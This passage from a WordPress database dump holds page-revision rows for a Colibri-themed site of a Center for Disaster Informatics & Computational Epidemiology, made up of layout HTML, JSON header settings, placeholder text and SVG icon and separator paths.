</div>\n      <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c12-outer\">\n        <div data-colibri-id=\"20-c12\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c12 position-relative\">\n          <!---->\n          <!---->\n          <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n            <!---->\n            <div data-colibri-id=\"20-c13\" class=\"h-icon style-274 style-local-20-c13 position-relative h-element\">\n              <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c13-icon\"><!--Icon by Font Awesome (https://fontawesome.com)--><svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"users\" viewBox=\"0 0 1920 1896.0833\"><path d=\"M593 896q-162 5-265 128H194q-82 0-138-40.5T0 865q0-353 124-353 6 0 43.5 21t97.5 42.5T384 597q67 0 133-23-5 37-5 66 0 139 81 256zm1071 637q0 120-73 189.5t-194 69.5H523q-121 0-194-69.5T256 1533q0-53 3.5-103.5t14-109T300 1212t43-97.5 62-81 85.5-53.5T602 960q10 0 43 21.5t73 48 107 48 135 21.5 135-21.5 107-48 73-48 43-21.5q61 0 111.5 20t85.5 53.5 62 81 43 97.5 26.5 108.5 14 109 3.5 103.5zM640 256q0 106-75 181t-181 75-181-75-75-181 75-181T384 0t181 75 75 181zm704 384q0 159-112.5 271.5T960 1024 688.5 911.5 576 640t112.5-271.5T960 256t271.5 112.5T1344 640zm576 225q0 78-56 118.5t-138 40.5h-134q-103-123-265-128 81-117 81-256 0-29-5-66 66 23 133 23 59 0 119-21.5t97.5-42.5 43.5-21q124 0 124 353zm-128-609q0 106-75 181t-181 75-181-75-75-181 75-181 181-75 181 75 75 181z\"></path></svg></span></div>\n            <div\n              data-colibri-id=\"20-c14\" class=\"h-global-transition-all h-heading style-275 style-local-20-c14 position-relative h-element\">\n              <!---->\n              <div class=\"h-heading__outer style-275 style-local-20-c14\">\n                <!---->\n                <!---->\n                <h5 class=\"\">population disparities</h5>\n              </div>\n          </div>\n          <div data-colibri-id=\"20-c15\" class=\"h-text h-text-component style-276 style-local-20-c15 position-relative h-element\">\n            <!---->\n            <!---->\n            <div class=\"\">\n              <p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.</p>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>\n</div>\n</div>\n</div>','Front Page','','inherit','closed','closed','','20-revision-v1','','','2022-02-16 15:45:12','2022-02-16 15:45:12','',20,'https://gsudice.dataconn.net/?p=330',0,'revision','',0),(331,1,'2022-02-16 15:45:12','2022-02-16 15:45:12','{\"name\":\"hop-header\",\"id\":\"22-h1\",\"type\":\"header\",\"ui\":{\"isSelected\":true,\"isHovered\":false},\"partialId\":22,\"styleRef\":194,\"children\":[{\"name\":\"hop-navigation\",\"props\":{\"anchor\":false,\"name\":\"Navigation\",\"attrs\":{\"id\":\"navigation\"},\"backup\":{\"overlap\":{\"menu\":null}}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"logo\"},\"mirror\":\"navigation-logo\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-logo\"}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"22-h5\",\"parentId\":\"22-h4\",\"partialId\":22,\"styleRef\":247,\"type\":\"header\"}],\"id\":\"22-h4\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":246,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"spacing\"},\"mirror\":\"navigation-spacing\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-spacing\"}},\"id\":\"22-h6\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":248,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"menu\"},\"mirror\":\"navigation-menu\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-menu\"}},\"children\":[{\"name\":\"hop-horizontal-menu\",\"children\":[{\"name\":\"hop-mobile-menu\",\"children\":[{\"name\":\"hop-offscreen-panel\",\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"22-h14\",\"parentId\":\"22-h13\",\"partialId\":22,\"styleRef\":256,\"type\":\"header\"}],\"id\":\"22-h13\",\"parentId\":\"22-h12\",\"partialId\":22,\"styleRef\":255,\"type\":\"header\"}],\"id\":\"22-h12\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":254,\"type\":\"header\"}],\"footer\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-text\",\"props\":{\"content\":\"<p>&copy; 2022<\\/p>\"},\"id\":\"22-h17\",\"parentId\":\"22-h16\",\"partialId\":22,\"styleRef\":259,\"type\":\"header\"}],\"id\":\"22-h16\",\"parentId\":\"22-h15\",\"partialId\":22,\"styleRef\":258,\"type\":\"header\"}],\"id\":\"22-h15\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":257,\"type\":\"header\"}]},\"children\":[{\"name\":\"hop-accordion-menu\",\"props\":{\"_isOffcanvasMenu\":true},\"id\":\"22-h11\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":253,\"type\":\"header\"}],\"id\":\"22-h10\",\"parentId\":\"22-h9\",\"partialId\":22,\"styleRef\":252,\"type\":\"header\"}],\"id\":\"22-h9\",\"parentId\":\"22-h8\",\"partialId\":22,\"styleRef\":251,\"type\":\"header\"}],\"props\":{\"wordpressThemeLocation\":{\"id\":\"header-menu\",\"label\":\"Header primary menu\"}},\"id\":\"22-h8\",\"parentId\":\"22-h7\",\"partialId\":22,\"styleRef\":250,\"type\":\"header\"}],\"id\":\"22-h7\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":249,\"type\":\"header\"}],\"id\":\"22-h3\",\"parentId\":\"22-h2\",\"partialId\":22,\"styleRef\":245,\"type\":\"header\"}],\"parentId\":\"22-h1\",\"type\":\"header\",\"id\":\"22-h2\",\"partialId\":22,\"slots\":{\"topBar\":[{\"name\":\"hop-top-bar\",\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"75\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-icon-list\",\"props\":{\"iconList\":[{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"Location, State, Country\",\"allIcons\":false,\"icon\":\"font-awesome\\/map-marker\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"(000) 123 12345\",\"allIcons\":false,\"icon\":\"font-awesome\\/phone-square\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"email@yoursite.com\",\"allIcons\":false,\"icon\":\"font-awesome\\/envelope\",\"type\":\"svg\"}]},\"styleRef\":263,\"slot\":null,\"parentId\":\"22-h20\",\"index\":0,\"id\":\"22-h21\",\"partialId\":22,\"type\":\"header\"}],\"id\":\"22-h20\",\"parentId\":\"22-h19\",\"partialId\":22,\"styleRef\":262,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"25\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"font-awesome\\/facebook-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/twitter-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/youtube-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/vimeo-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}}]},\"styleRef\":265,\"slot\":null,\"parentId\":\"22-h22\",\"index\":0,\"id\":\"22-h23\",\"partialId\":22,\"type\":\"header\"}],\"id\":\"22-h22\",\"parentId\":\"22-h19\",\"partialId\":22,\"styleRef\":264,\"type\":\"header\"}],\"id\":\"22-h19\",\"parentId\":\"22-h18\",\"partialId\":22,\"styleRef\":261,\"type\":\"header\"}],\"id\":\"22-h18\",\"parentId\":\"22-h2\",\"partialId\":22,\"styleRef\":260,\"type\":\"header\",\"slot\":\"topBar\"}]},\"styleRef\":244},{\"name\":\"hop-hero\",\"props\":{\"name\":\"Hero\",\"attrs\":{\"id\":\"hero\"},\"anchor\":false},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"tablet\":{\"columnWidth\":{\"custom\":{\"value\":80,\"unit\":\"%\"}}}}}}},\"props\":{\"internal\":{\"heroSection\":{\"type\":\"text\"}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Center for Disaster Informatics &amp; Computational Epidemiology<br>\"},\"id\":\"22-h27\",\"parentId\":\"22-h26\",\"partialId\":22,\"styleRef\":215,\"type\":\"header\"},{\"name\":\"hop-text\",\"props\":{\"content\":\"<p>Enabling Data-Driven Disaster Assessment &amp; Planning<br><\\/p>\"},\"id\":\"22-h28\",\"parentId\":\"22-h26\",\"partialId\":22,\"styleRef\":216,\"type\":\"header\"},{\"name\":\"hop-button-group\",\"children\":[{\"name\":\"hop-button\",\"props\":{\"text\":\"Learn More\",\"link\":{\"value\":\"\\/about\\/\"}},\"id\":\"22-h30\",\"parentId\":\"22-h29\",\"partialId\":22,\"styleRef\":218,\"type\":\"header\"}],\"id\":\"22-h29\",\"parentId\":\"22-h26\",\"partialId\":22,\"styleRef\":217,\"type\":\"header\"}],\"id\":\"22-h26\",\"parentId\":\"22-h25\",\"partialId\":22,\"styleRef\":214,\"type\":\"header\"},{\"name\":\"hop-column\",\"children\":[{\"name\":\"hop-image\",\"id\":\"22-h32\",\"parentId\":\"22-h31\",\"partialId\":22,\"styleRef\":221,\"type\":\"header\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/02\\/unsplash.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":258,\"size\":\"\"}}],\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"tablet\":{\"columnWidth\":{\"custom\":{\"value\":80,\"unit\":\"%\"}}}}}}},\"props\":{\"internal\":{\"heroSection\":{\"type\":\"media\"}}},\"id\":\"22-h31\",\"parentId\":\"22-h25\",\"partialId\":22,\"styleRef\":220,\"type\":\"header\"}],\"id\":\"22-h25\",\"parentId\":\"22-h24\",\"partialId\":22,\"styleRef\":213,\"type\":\"header\"}],\"parentId\":\"22-h1\",\"id\":\"22-h24\",\"partialId\":22,\"styleRef\":212,\"type\":\"header\",\"slots\":{\"downArrow\":[{\"name\":\"hop-down-arrow\",\"slots\":{\"button\":[{\"name\":\"hop-down-arrow-scroll-button-group\",\"children\":[{\"name\":\"hop-down-arrow-scroll-button\",\"id\":\"22-h35\",\"parentId\":\"22-h34\",\"partialId\":22,\"styleRef\":224,\"type\":\"header\",\"props\":{\"text\":\"down\"}}],\"id\":\"22-h34\",\"parentId\":\"22-h33\",\"partialId\":22,\"styleRef\":223,\"type\":\"header\"}],\"icon\":[{\"name\":\"hop-down-arrow-scroll-icon\",\"id\":\"22-h36\",\"parentId\":\"22-h33\",\"partialId\":22,\"styleRef\":225,\"type\":\"header\",\"props\":{\"name\":\"font-awesome\\/angle-down\"}}]},\"parentId\":\"22-h24\",\"slot\":\"downArrow\",\"id\":\"22-h33\",\"partialId\":22,\"styleRef\":222,\"type\":\"header\"}]}}]}','','','inherit','closed','closed','','23-revision-v1','','','2022-02-16 15:45:12','2022-02-16 15:45:12','',23,'https://gsudice.dataconn.net/?p=331',0,'revision','',0),(332,1,'2022-02-16 15:45:12','2022-02-16 15:45:12','<div data-colibri-id=\"22-h1\" class=\"page-header style-194 style-local-22-h1 position-relative\">\n  <!---->\n  <div data-colibri-navigation-overlap=\"false\" role=\"banner\" class=\"h-navigation_outer style-244-outer style-local-22-h2-outer\">\n    <!---->\n    <div id=\"navigation\" data-colibri-component=\"navigation\" data-colibri-id=\"22-h2\" class=\"h-section h-navigation h-navigation d-flex style-244 style-local-22-h2\">\n      <!---->\n      <div class=\"h-section-grid-container h-section-fluid-container\">\n        <div data-nav-normal=\"\">\n          <div data-colibri-id=\"22-h3\" class=\"h-row-container h-section-boxed-container gutters-row-lg-0 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-2 style-245 style-local-22-h3 position-relative\">\n            <!---->\n            <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-2\">\n              <!---->\n              <div class=\"h-column h-column-container d-flex h-col-none style-246-outer style-local-22-h4-outer\">\n                <div data-colibri-id=\"22-h4\" data-placeholder-provider=\"navigation-logo\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-246 style-local-22-h4 position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n                    <!---->\n                    <div data-colibri-id=\"22-h5\" class=\"d-flex align-items-center text-lg-center text-md-center text-center justify-content-lg-center justify-content-md-center justify-content-center style-247 style-local-22-h5 position-relative h-element\">\n                      <!---->\n                      <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\">\n                        <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__image h-logo__image_h logo-image style-247-image style-local-22-h5-image\">\n                        <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__alt-image h-logo__alt-image_h logo-alt-image style-247-image style-local-22-h5-image\">\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n              <div class=\"h-column h-column-container d-flex h-col-none style-248-outer style-local-22-h6-outer h-hide-sm\">\n                <div data-colibri-id=\"22-h6\" data-placeholder-provider=\"navigation-spacing\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-248 style-local-22-h6 h-hide-sm position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                    <!---->\n                  </div>\n                </div>\n              </div>\n              <div class=\"h-column h-column-container d-flex h-col-none style-249-outer style-local-22-h7-outer\">\n                <div data-colibri-id=\"22-h7\" data-placeholder-provider=\"navigation-menu\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-249 style-local-22-h7 position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n                    <!---->\n                    <div data-colibri-component=\"dropdown-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"22-h8\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography has-offcanvas-mobile h-menu-horizontal h-dropdown-menu style-250 style-local-22-h8 position-relative h-element\">\n                      <!---->\n                      <div class=\"h-global-transition-all h-main-menu\">[colibri_print_menu id=\"header-menu\" classes=\"none \" show_shopping_cart=\"0\" depth=\"0\"]</div>\n                      <div data-colibri-id=\"22-h9\" class=\"h-mobile-menu h-global-transition-disable style-251 style-local-22-h9 position-relative h-element\">\n                        <!---->\n                        <a data-click-outside=\"true\" data-target=\"#offcanvas-wrapper-22-h9\" data-target-id=\"offcanvas-wrapper-22-h9\" data-offcanvas-overlay-id=\"offcanvas-overlay-22-h9\" href=\"#\" data-colibri-component=\"offcanvas\" data-direction=\"right\"\n                          data-push=\"false\" title=\"Menu\" class=\"h-hamburger-button\">\n                          <div class=\"icon-container h-hamburger-icon\">\n                            <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                              <!--Icon by Font Awesome (https://fontawesome.com)-->\n                              <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"bars\" viewBox=\"0 0 1536 1896.0833\">\n                                <path d=\"M1536 1344v128q0 26-19 45t-45 19H64q-26 0-45-19t-19-45v-128q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 960V832q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 448V320q0-26 19-45t45-19h1408q26 0 45 19t19 45z\"></path>\n                              </svg>\n                            </div>\n                          </div>\n                        </a>\n                        <div id=\"offcanvas-wrapper-22-h9\" class=\"h-offcanvas-panel offcanvas offcanvas-right hide force-hide style-251-offscreen style-local-22-h9-offscreen\">\n                          <div data-colibri-id=\"22-h10\" class=\"d-flex flex-column h-offscreen-panel style-252 style-local-22-h10 position-relative h-element\">\n                            <!---->\n                            <div class=\"offscreen-header h-ui-empty-state-container\">\n                              <div data-colibri-id=\"22-h12\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-254 style-local-22-h12 position-relative\">\n                                <!---->\n                                <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n                                  <!---->\n                                  <div class=\"h-column h-column-container d-flex h-col-none style-255-outer style-local-22-h13-outer\">\n                                    <div data-colibri-id=\"22-h13\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-255 style-local-22-h13 position-relative\">\n                                      <!---->\n                                      <!---->\n                                      <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                                        <!---->\n                                        <div data-colibri-id=\"22-h14\" class=\"d-flex align-items-center text-lg-center text-md-center text-center justify-content-lg-center justify-content-md-center justify-content-center style-256 style-local-22-h14 position-relative h-element\">\n                                          <!---->\n                                          <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\">\n                                            <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__image h-logo__image_h logo-image style-256-image style-local-22-h14-image\">\n                                            <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__alt-image h-logo__alt-image_h logo-alt-image style-256-image style-local-22-h14-image\">\n                                          </a>\n                                        </div>\n                                      </div>\n                                    </div>\n                                  </div>\n                                </div>\n                              </div>\n                            </div>\n                            <div class=\"offscreen-content\">\n                              <!---->\n                              <div data-colibri-component=\"accordion-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"22-h11\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography h-mobile-menu h-menu-accordion style-253 style-local-22-h11 position-relative h-element\">\n                                <!---->\n                                <div class=\"h-global-transition-all h-mobile-menu\">[colibri_print_menu id=\"header-menu\" classes=\"none \" show_shopping_cart=\"0\" depth=\"0\"]</div>\n                              </div>\n                            </div>\n                            <div class=\"offscreen-footer h-ui-empty-state-container\">\n                              <div data-colibri-id=\"22-h15\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-257 style-local-22-h15 position-relative\">\n                                <!---->\n                                <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n                                  <!---->\n                                  <div class=\"h-column h-column-container d-flex h-col-none style-258-outer style-local-22-h16-outer\">\n                                    <div data-colibri-id=\"22-h16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-258 style-local-22-h16 position-relative\">\n                                      <!---->\n                                      <!---->\n                                      <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                                        <!---->\n                                        <div data-colibri-id=\"22-h17\" class=\"h-text h-text-component style-259 style-local-22-h17 position-relative h-element\">\n                                          <!---->\n                                          <!---->\n                                          <div class=\"\">\n                                            <p>© 2022</p>\n                                          </div>\n                                        </div>\n                                      </div>\n                                    </div>\n                                  </div>\n                                </div>\n                              </div>\n                            </div>\n                          </div>\n                        </div>\n                        <div id=\"offcanvas-overlay-22-h9\" class=\"offscreen-overlay style-251-offscreenOverlay style-local-22-h9-offscreenOverlay\"></div>\n                      </div>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n        <div data-nav-sticky=\"\" style=\"display: none;\"></div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-id=\"22-h24\" id=\"hero\" class=\"h-section h-hero d-flex align-items-lg-center align-items-md-center align-items-center style-212 style-local-22-h24 position-relative\">\n    <div class=\"background-wrapper\">\n      <div class=\"background-layer background-layer-media-container-lg\">\n        <!---->\n        <div class=\"overlay-layer\">\n          <div class=\"overlay-image-layer\" style=\"background-color: rgb(212, 211, 225); opacity: 0.5;\"></div>\n          <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n        </div>\n      </div>\n      <div class=\"background-layer background-layer-media-container-md\">\n        <!---->\n        <div class=\"overlay-layer\">\n          <div class=\"overlay-image-layer\" style=\"background-color: rgb(212, 211, 225); opacity: 0.5;\"></div>\n          <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n        </div>\n      </div>\n      <div class=\"background-layer background-layer-media-container\">\n        <!---->\n        <div class=\"overlay-layer\">\n          <div class=\"overlay-image-layer\" style=\"background-color: rgb(212, 211, 225); opacity: 0.5;\"></div>\n          <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n        </div>\n      </div>\n    </div>\n    <div class=\"h-separator\" style=\"height: 165px; top: 0px;\">\n      <svg style=\"fill:white;\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1920 120.14\" preserveAspectRatio=\"xMidYMax slice\">\n        <path d=\"M358.2,118.5c2.7.7,4.2.9,1.4,1.6,6.4.2,4.5-.4,6.4-.6-6.7-.4,5.4-.8,1.4-1.6C361,117.8,366.8,119.1,358.2,118.5Z\"></path>\n        <path d=\"M339.8,118.1c-3.6-.4,0-.6-6.3-.8C334.1,117.6,335.1,118,339.8,118.1Z\"></path>\n        <path d=\"M360.9,118.5c1-.3,4.5-.5-.8-.9C361.2,117.9,356.6,118.2,360.9,118.5Z\"></path>\n        <path d=\"M406.1,117.7c.9.2-1.1.5,1.9.6C410.1,118.2,412.5,117.9,406.1,117.7Z\"></path>\n        <path d=\"M374.9,117c2-.1,1.8-.7-3.4-.7C373,116.5,372.5,116.9,374.9,117Z\"></path>\n        <path d=\"M402.9,115.6c.6-.2,3.2-.2,2.2-.6C401.5,114.8,400,115.4,402.9,115.6Z\"></path>\n        <path d=\"M226.2,110.6c2-.2,1.7.7,4.8.8-1.5-.5,1.7-.5.5-1C228.2,110.4,222.5,110.2,226.2,110.6Z\"></path>\n        <path d=\"M404.4,114.2c-.2.1-1.4.1-2.6.2a8.94,8.94,0,0,0,3.2.5C405.3,114.7,406.5,114.4,404.4,114.2Z\"></path>\n        <path d=\"M332.9,111.9a66.47,66.47,0,0,1,7.2.3c-1.9-.4,2-.2,2.4-.4C339.1,111.5,336.8,112,332.9,111.9Z\"></path>\n        <path d=\"M393.1,112.4c-.9.3,2.5.4,4.7.5C399.4,112.6,398.4,112.3,393.1,112.4Z\"></path>\n        <path d=\"M340.6,111.1c-.5.3-2.4-.2-4.4-.2a25.42,25.42,0,0,1-3.9.3c3.5.1,6.8.1,8.6.3C339.4,111.3,344.9,111.3,340.6,111.1Z\"></path>\n        <path d=\"M313.3,110.2c-2.5,0-4.4-.1-5.8-.2.4.3,1.3.5,3.4.7C309.5,110.3,312.9,110.4,313.3,110.2Z\"></path>\n        <path d=\"M317.1,108.2c-3,0-3-.8-4.6-.5,3.4.6-11.6,0-5.1.5C309.8,107.9,313.6,108.4,317.1,108.2Z\"></path>\n        <path d=\"M326.8,108.1c-2.6.1-6.4,0-6.7.3C324.7,108.5,326.8,108.4,326.8,108.1Z\"></path>\n        <path d=\"M540.9,113c4,.1,3.8-.2,3.7-.5C540.1,112.4,540.3,112.7,540.9,113Z\"></path>\n        <path d=\"M320.1,106.8a37.78,37.78,0,0,1-4.5-.3c1.4.5-1.4,1.2,4,1.4C320.3,107.4,318.6,107.3,320.1,106.8Z\"></path>\n        <path d=\"M361,107.5c-.4.3-7.1.6.8.9C359.5,108,365.2,107.8,361,107.5Z\"></path>\n        <path d=\"M368.1,104.5c1.4,0,2.8.1,4.2.1-1-.4,3-.4-1.9-.6C371.8,104.4,366.8,104.2,368.1,104.5Z\"></path>\n        <path d=\"M354.9,102.2c-2.7-.1-3,.1-5.6,0,5.3.5-1.8,1.5,4.3,1.7.2-1.1,1.6-1.1,3.6-2.2C350.1,101.5,349.6,101.6,354.9,102.2Z\"></path>\n        <path d=\"M359,100.5c-5.3,0-4.4.6-6.1,1C359.4,101.6,357.9,100.9,359,100.5Z\"></path>\n        <path d=\"M87.7,93.8c-5.6-.2-1.5,1.4-.4,1.1C87.3,94.2,86.8,94.2,87.7,93.8Z\"></path>\n        <path d=\"M388.4,99.2a26.77,26.77,0,0,1-4.2,0c5.2.5,1.9.9,6.7,1.2C389.7,100.1,391.9,99.5,388.4,99.2Z\"></path>\n        <path d=\"M308,97.8c-.3-.1-.6-.3-3-.3-.6.5,10,.7,10,.3C310.9,97.7,311.5,98,308,97.8Z\"></path>\n        <path d=\"M475.7,100.5c0,.2-3.8.8,2.2.9C476.8,101.2,478.9,100.7,475.7,100.5Z\"></path>\n        <path d=\"M369.5,98.2c4.2.1,3.2.6,6.3.8-1.3-.4,5.9-.5.5-1C378.9,98.6,369,97.9,369.5,98.2Z\"></path>\n        <path d=\"M112,92.9c0-.4,1.8-.7,1.8-1.2C110,91.7,108,92.8,112,92.9Z\"></path>\n        <path d=\"M465,99.5c-5.2-.4-2.3-.7-6.3-.9.2.6,3.4,1,5.4,1.4C462.7,99.7,465.9,99.8,465,99.5Z\"></path>\n        <path d=\"M382.4,97.1c-.5.3-2.3.7,1,1.1C383.6,98.1,386.1,97.5,382.4,97.1Z\"></path>\n        <path d=\"M375,96.6c-2.5,0-4.4-.1-5.8-.2-.8.4,3.2.6,3.6,1-2-.1-2.5-.2-4.4-.3l.2.2c-.9,0-1.7,0-1.3.1,4.5,0,2.3.4,6,.5,3.6-.4.4-.6-1-1.1A24.16,24.16,0,0,0,375,96.6Z\"></path>\n        <path d=\"M360.5,97.5c.2-.4,2.6-1-1.3-1.4C359.1,96.6,355.4,97,360.5,97.5Z\"></path>\n        <path d=\"M137.1,91.4c2.5,0,3.4.2,3.1.4,1.4,0,2.8.1,4.3.1C145.1,91.6,139.2,91.1,137.1,91.4Z\"></path>\n        <path 